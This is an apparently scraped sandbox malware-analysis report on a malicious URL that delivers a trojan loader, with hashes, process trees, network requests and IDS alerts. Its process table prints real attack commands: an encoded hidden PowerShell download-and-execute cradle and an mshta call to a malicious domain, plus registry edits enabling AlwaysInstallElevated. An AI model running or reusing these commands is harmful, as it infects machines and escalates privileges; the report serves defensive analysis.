analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://alfcck.xyz/

Full analysis: https://app.any.run/tasks/1bec8c96-4692-4b2e-bf58-ab57e5c8baf4
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: September 19, 2019, 07:19:46
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
loader
Indicators:
MD5:

004D831EF62DF81933AE190163A41F8E

SHA1:

0B26FA162CFE81385DA307EEB2331F1CADD7118F

SHA256:

31F581CC5A5AE9CE187B6D901C1934077EE849E5D06F9164BF07994F03CD986D

SSDEEP:

3:N1Kffkdci:CnUci

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • mshta.exe (PID: 1792)
    • Known privilege escalation attack

      • powershell.exe (PID: 3300)
    • Starts Visual C# compiler

      • powershell.exe (PID: 1520)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 4092)
    • Disables Windows Defender

      • msiexec.exe (PID: 4092)
  • SUSPICIOUS

    • Executes PowerShell scripts

      • iexplore.exe (PID: 3868)
      • iexplore.exe (PID: 3552)
      • powershell.exe (PID: 3300)
      • MsiExec.exe (PID: 2072)
      • MSIF7D6.tmp (PID: 2424)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • iexplore.exe (PID: 3868)
    • Reads Internet Cache Settings

      • mshta.exe (PID: 1792)
    • Uses REG.EXE to modify Windows registry

      • cmd.exe (PID: 3912)
    • Creates files in the user directory

      • mshta.exe (PID: 1792)
      • powershell.exe (PID: 3300)
      • powershell.exe (PID: 1520)
      • powershell.exe (PID: 1808)
      • powershell.exe (PID: 3096)
    • Starts CMD.EXE for commands execution

      • Eventvwr.exe (PID: 3032)
    • Modifies the open verb of a shell class

      • powershell.exe (PID: 3300)
    • Application launched itself

      • powershell.exe (PID: 3300)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 4092)
    • Creates or modifies windows services

      • netsh.exe (PID: 3908)
    • Reads Environment values

      • MsiExec.exe (PID: 2072)
    • Creates files in the Windows directory

      • msiexec.exe (PID: 4092)
    • Uses NETSH.EXE for network configuration

      • MsiExec.exe (PID: 3720)
  • INFO

    • Application launched itself

      • iexplore.exe (PID: 3552)
      • msiexec.exe (PID: 4092)
    • Creates files in the user directory

      • iexplore.exe (PID: 3868)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 3868)
    • Changes internet zones settings

      • iexplore.exe (PID: 3552)
    • Reads internet explorer settings

      • iexplore.exe (PID: 3868)
      • mshta.exe (PID: 1792)
    • Reads settings of System Certificates

      • iexplore.exe (PID: 3552)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 4092)
    • Loads dropped or rewritten executable

      • MsiExec.exe (PID: 2072)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 4092)
    • Application was dropped or rewritten from another process

      • MSIF7D6.tmp (PID: 2424)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
108
Monitored processes
44
Malicious processes
6
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start iexplore.exe iexplore.exe powershell.exe no specs powershell.exe mshta.exe powershell.exe eventvwr.exe no specs eventvwr.exe cmd.exe no specs reg.exe no specs reg.exe no specs powershell.exe no specs csc.exe cvtres.exe no specs msiexec.exe msiexec.exe no specs msiexec.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs msif7d6.tmp no specs powershell.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3552"C:\Program Files\Internet Explorer\iexplore.exe" -nohomeC:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3868"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3552 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2700"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAGoAZQBpAHQAYQBjAGEAdgBlAC4AbwByAGcALwBwAHMAMAAwADEALgBqAHAAZwAnACkADQAKAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeiexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3300"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAGoAZQBpAHQAYQBjAGEAdgBlAC4AbwByAGcALwBwAHMAMAAwADEALgBqAHAAZwAnACkADQAKAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1792mshta http://jeitacave.org/hta.htaC:\Windows\system32\mshta.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
4016"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -windowstyle hidden -exec bypass -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAGoAZQBpAHQAYQBjAGEAdgBlAC4AbwByAGcALwBwAHMAMAAwADEALgBqAHAAZwAnACkADQAKAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3840"C:\Windows\System32\Eventvwr.exe" C:\Windows\System32\Eventvwr.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Event Viewer Snapin Launcher
Exit code:
3221226540
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3032"C:\Windows\System32\Eventvwr.exe" C:\Windows\System32\Eventvwr.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Event Viewer Snapin Launcher
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3912"cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 00000001 /f&reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 00000001 /fC:\Windows\system32\cmd.exeEventvwr.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3148reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 00000001 /fC:\Windows\system32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Registry Console Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
3 225
Read events
1 555
Write events
0
Delete events
0

Modification events

No data
Executable files
5
Suspicious files
12
Text files
22
Unknown types
6

Dropped files

PID
Process
Filename
Type
3552iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\favicon[1].ico
MD5:
SHA256:
3552iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
3300powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1BBJB4T09HGVNP9R19V6.temp
MD5:
SHA256:
1520powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZA9GU7FBZYJS9J6EAXHL.temp
MD5:
SHA256:
2916csc.exeC:\Users\admin\AppData\Local\Temp\CSCB9BB.tmp
MD5:
SHA256:
2916csc.exeC:\Users\admin\AppData\Local\Temp\iels5yar.pdb
MD5:
SHA256:
3908cvtres.exeC:\Users\admin\AppData\Local\Temp\RESB9BC.tmp
MD5:
SHA256:
2916csc.exeC:\Users\admin\AppData\Local\Temp\iels5yar.dll
MD5:
SHA256:
2916csc.exeC:\Users\admin\AppData\Local\Temp\iels5yar.out
MD5:
SHA256:
3868iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.datdat
MD5:1543619E2B733B088798D7D0B70374E6
SHA256:D387B52DEE27A6B407D13E2910326A83A9647053297CD85E8C75439E21209EF9
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
7
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3868
iexplore.exe
GET
404
104.24.112.108:80
http://alfcck.xyz/cdn-cgi/apps/head/xGpmLMHiaqCy-agu1ud6fHqKiTo.js
US
malicious
3868
iexplore.exe
GET
200
104.24.112.108:80
http://alfcck.xyz/3.htm
US
text
458 b
malicious
3868
iexplore.exe
GET
200
104.24.112.108:80
http://alfcck.xyz/
US
html
7.60 Kb
malicious
3300
powershell.exe
GET
200
104.28.18.126:80
http://jeitacave.org/ps001.jpg
US
text
81.6 Kb
malicious
1792
mshta.exe
GET
200
104.28.18.126:80
http://jeitacave.org/hta.hta
US
html
466 b
malicious
4092
msiexec.exe
GET
200
104.28.18.126:80
http://jeitacave.org/1U22nOJHFdDmYcgCS.jpg
US
executable
3.43 Mb
malicious
4016
powershell.exe
GET
200
104.28.18.126:80
http://jeitacave.org/ps001.jpg
US
text
81.6 Kb
malicious
3552
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3552
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
3868
iexplore.exe
104.24.112.108:80
alfcck.xyz
Cloudflare Inc
US
shared
1792
mshta.exe
104.28.18.126:80
jeitacave.org
Cloudflare Inc
US
shared
104.24.112.108:80
alfcck.xyz
Cloudflare Inc
US
shared
3300
powershell.exe
104.28.18.126:80
jeitacave.org
Cloudflare Inc
US
shared
4016
powershell.exe
104.28.18.126:80
jeitacave.org
Cloudflare Inc
US
shared
4092
msiexec.exe
104.28.18.126:80
jeitacave.org
Cloudflare Inc
US
shared

DNS requests

Domain
IP
Reputation
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
alfcck.xyz
  • 104.24.112.108
  • 104.24.113.108
malicious
jeitacave.org
  • 104.28.18.126
  • 104.28.19.126
malicious

Threats

PID
Process
Class
Message
3868
iexplore.exe
Potentially Bad Traffic
AV INFO HTTP Request to a *.xyz domain
3868
iexplore.exe
Attempted User Privilege Gain
ET WEB_CLIENT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Percent Hex Encode
3868
iexplore.exe
Attempted User Privilege Gain
ET EXPLOIT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Common Function Name
3868
iexplore.exe
Attempted User Privilege Gain
ET EXPLOIT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Common Construct Hex Encode
3868
iexplore.exe
Attempted Administrator Privilege Gain
ET EXPLOIT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Common Construct M2
3868
iexplore.exe
A Network Trojan was detected
ET TROJAN Possibly Malicious Base64 Unicode WebClient DownloadString M3
3868
iexplore.exe
Potentially Bad Traffic
AV INFO HTTP Request to a *.xyz domain
1792
mshta.exe
Potentially Bad Traffic
ET POLICY Possible HTA Application Download
1792
mshta.exe
Attempted User Privilege Gain
ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl
1792
mshta.exe
A Network Trojan was detected
ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)
1 ETPRO signatures available at the full report
Process
Message
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144